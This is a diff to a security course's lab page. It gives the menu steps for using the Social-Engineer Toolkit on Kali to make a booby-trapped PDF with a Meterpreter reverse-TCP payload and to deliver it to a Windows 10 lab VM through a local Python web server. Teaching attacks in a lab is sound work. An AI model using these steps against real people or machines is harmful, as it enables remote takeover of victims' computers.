security-assignments/security-assignments.github.io/_labs/lab_social_engineering.md

     * `1) Social-Engineering Attacks`
     * `3) Infectious Media Generator`
     * `1) File-Format Exploits`
-    * enter kali ip address
+    * Enter the Kali IP address: `192.168.55.101`
     * `13) Adobe PDF Embedded EXE Social Engineering`
     * `2.
-Use built-in BLANK PDF for attack` (unless you're feelinga adventurous, in which case you can create your own)
+Use built-in BLANK PDF for attack` (unless you're feeling adventurous, in which case you can create your own)
     * `2) Windows Meterpreter Reverse_TCP`
-    * Accept default for payload listener LHOST
+    * Accept default for payload listener LHOST by pressing enter.
-    * Accept default for port to connect back on
+    * Accept default for port to connect back on by pressing enter.
-    * Let `set` create a listener right now (`yes`)
+    * Let `SET` create a listener right now (`yes`)

 2. SET will have put the created payload in `/root/.set/template.pdf`.
 Your goal now is to get this pdf onto the victim machine.
-    If you still have the python server running in the `/tmp` dir from the fake adobeupdate part of this lab, then you can just move this payload there and download it to the victim machine as before.
-From a different Kali terminal than the `set` one:
+    If you still have the Python server running in the `/tmp` dir from the fake adobeupdate part of this lab, then you can just move this payload there and download it to the victim machine as before.
+From a different Kali terminal than the `SET` one:

         mv /root/.set/template.pdf /tmp

     You can rename it to whatever you like.

-3. On the victim machine, open the downloaded file with Adobe Reader
+3. On the Windows 10 VM, save the PDF to the desktop by browsing to `http://192.168.55.101:8888`.
+Open the downloaded file with Adobe Reader

     * Right-click the downloaded file > `Open with...` > 'Adobe Reader 9.0`